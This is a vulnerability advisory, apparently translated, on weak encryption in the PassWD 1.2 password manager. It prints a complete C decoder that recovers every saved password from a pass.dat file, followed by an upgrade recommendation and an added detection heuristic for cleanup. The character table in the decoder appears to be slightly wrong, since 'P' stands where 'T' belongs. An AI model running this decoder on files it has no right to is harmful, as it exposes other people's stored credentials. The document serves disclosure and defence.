PassWD 1.2 Weak Encryption Vulnerability

Published: 2000-06-06
Updated: 2000-06-06

Affected systems:

    PassWD PassWD 1.2
       - Microsoft Windows 98
       - Microsoft Windows 95
       - Microsoft Windows NT 4.0
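Description:

    PassWd 1.2 is a password management tool that stores user login
    information for various URLs, such as user names, passwords and links,
    in the pass.dat file in the PassWD installation directory. Unfortunately,
    this information is stored in pass.dat with a very weak encryption
    mechanism: a single key decodes all of the saved passwords.

    <* Source: Daniel Roethlisberger admin@roe.ch *>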




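Test method:

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!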

/*
 *  Decoder for PassWD v1.2 `pass.dat' password files
 *
 *  Written 2000 by Daniel Roethlisberger <admin@roe.ch>
 *
 *  This code is hereby placed in the public domain.
 *  Use this code at your own risk for whatever you want.
 *
 *  The decoded data is not parsed in any way - it should
 *  be very easy to moderately experienced programmers
 *  to add that themselves.
 *
 */

#include <stdio.h>

#define CHARSET_LEN 99   /* entries in one copy of the table */

/* close whichever streams were opened (portable stand-in for _fcloseall) */
static void close_files(FILE *in, FILE *out)
{
   if(in != NULL)
      fclose(in);
   if(out != NULL && out != stdout)
      fclose(out);
}

int main(int argc, char *argv[])
{
   int charpos;
   FILE* outfile = NULL;
   FILE* infile = NULL;
   int a, b, x;   /* int rather than char, so EOF from getc() is detectable */
   int key;

   /* the 99-entry table, stored twice so that (charpos + 99 - key) needs
      no modulo; the characters are kept exactly as printed in the advisory */
   static const unsigned char charset[] =
      "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@AB"
      "CDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
      "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@AB"
      "CDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";

   printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
   printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");

   if((argc > 3) || (argc < 2))
   {
      printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
      printf("If <outfile> is omitted, the output is dumped to stdout.\n");
      return 1;
   }

   infile = fopen(argv[1], "r");
   if(infile == NULL)
   {
      printf("Could not open file %s\n", argv[1]);
      return 1;
   }

   if(argc == 2)
      outfile = stdout;
   else
   {
      outfile = fopen(argv[2], "w");
      if(outfile == NULL)
      {
         printf("Could not write to file %s\n", argv[2]);
         close_files(infile, outfile);
         return 1;
      }
   }

   getc(infile);       /* jump over decoy byte    */
   a = getc(infile);   /* read encoded key byte 1 */
   b = getc(infile);   /* read encoded key byte 2 */

   if(a == EOF || b == EOF)
   {
      printf("ERROR - encountered EOF within header\n");
      close_files(infile, outfile);
      return 1;
   }

   /* this line `decodes' the key */
   key = (a - 'b') * 10 + (b - 'b');

   /* a key outside 0..99 would index outside the doubled table */
   if(key < 0 || key > CHARSET_LEN)
   {
      printf("ERROR - key in header is out of range\n");
      close_files(infile, outfile);
      return 1;
   }

   /* read through infile and dump decoded output to outfile: */
   x = getc(infile);
   while(x != EOF)
   {
      /* find the position of the cypher character in the table */
      for(charpos = 0; charpos < CHARSET_LEN && x != charset[charpos]; charpos++)
         ;
      if(charpos == CHARSET_LEN)
      {
         printf("\nERROR - encountered illegal character in source file\n");
         close_files(infile, outfile);
         return 1;
      }
      /* plain = cypher - key */
      putc(charset[charpos + CHARSET_LEN - key], outfile);
      x = getc(infile);
   }

   if(argc == 2)
      printf("\n\n");
   printf("Done.\n");

   close_files(infile, outfile);
   return 0;
}


Recommendation:
For now, consider upgrading to PassWD 2000 and deleting the old pass.dat file.
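
To support the cleanup recommended above, the following added example (not part of the original advisory and not the author's code) flags files that fit the layout the decoder relies on: a decoy byte, two key bytes, then bytes drawn only from the 99-entry table. That each key byte is 'b' plus one decimal digit is an assumption inferred from the key formula, and the function names are hypothetical.

```c
#include <stdio.h>
#include <stddef.h>

/* Table values: \b \t \n \r plus printable ASCII 0x20..0x7E. The table as
 * printed on the page has 'P' in the slot where 'T' would fall; this check
 * accepts 'T' as well. */
static int in_table(unsigned char c)
{
    return c == '\b' || c == '\t' || c == '\n' || c == '\r' ||
           (c >= 0x20 && c <= 0x7E);
}

/* Assumption: each key byte encodes one decimal digit as 'b' + digit. */
static int is_key_byte(unsigned char c) { return c >= 'b' && c <= 'k'; }

/* Hypothetical helper: 1 if buf fits the layout (decoy byte, two key bytes,
 * table-only body), 0 otherwise. It is a heuristic and decodes nothing. */
int fits_passwd12_layout(const unsigned char *buf, size_t len)
{
    size_t i;
    if (buf == NULL || len < 3) return 0;            /* header is 3 bytes */
    if (!is_key_byte(buf[1]) || !is_key_byte(buf[2])) return 0;
    for (i = 3; i < len; i++)
        if (!in_table(buf[i])) return 0;
    return 1;
}

/* Hypothetical helper: apply the check to the first 64 KiB of a file.
 * Returns 1 for a match, 0 for no match, -1 if the file cannot be opened. */
int file_fits_passwd12_layout(const char *path)
{
    static unsigned char buf[65536];
    size_t n;
    FILE *f = fopen(path, "rb");
    if (f == NULL) return -1;
    n = fread(buf, 1, sizeof buf, f);
    fclose(f);
    return fits_passwd12_layout(buf, n);
}

int main(int argc, char *argv[])
{
    int i, flagged = 0;
    for (i = 1; i < argc; i++) {
        int r = file_fits_passwd12_layout(argv[i]);
        if (r == 1) { printf("%s: fits PassWD 1.2 layout, review and delete\n", argv[i]); flagged++; }
        else if (r < 0) printf("%s: cannot open\n", argv[i]);
    }
    return flagged ? 1 : 0;
}
```

Because the check is only a layout heuristic, short plain-text files can match it; confirm a flagged file's location and name before deleting it.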


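This vulnerability report was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.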